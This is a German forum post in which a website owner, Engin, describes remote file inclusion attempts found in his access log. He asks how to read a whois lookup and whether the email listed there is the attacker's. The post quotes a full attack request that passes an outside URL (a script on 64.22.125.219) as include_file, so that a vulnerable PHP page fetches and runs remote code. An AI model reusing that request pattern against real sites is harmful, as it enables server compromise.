Hi,
hab grade in meinen access.log einen Hacker ausfindig gemacht, dieses mal auf meiner geliebten nimmet Domain.
Hab dutzende abfragen in Form von
/lokal//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt???
Die IPs sind
216.252.87.12 - libwww-perl/5.79
64.22.125.219 - libwww-perl/5.805
und einige mehr..
Eine Who is abfrage erzählt mir was von einem "ENGIN7-ARIN"... :-)
Was sagt überhaupt diese Whois abfrage aus, ich versteh das nicht so ganz.
Ist die dort angegebene E-Mail adresse die des hackers?
Seine Seite ist auch über die IP abrufbar, http://64.22.125.219/, nur hat der Vogel kein Impressum,
den sollte man so einen Abmahn-wütigen Anwalt auf den Hals hetzen. *g
Warum finden diese idioten immer mich?
Grüße aus H im R,
Engin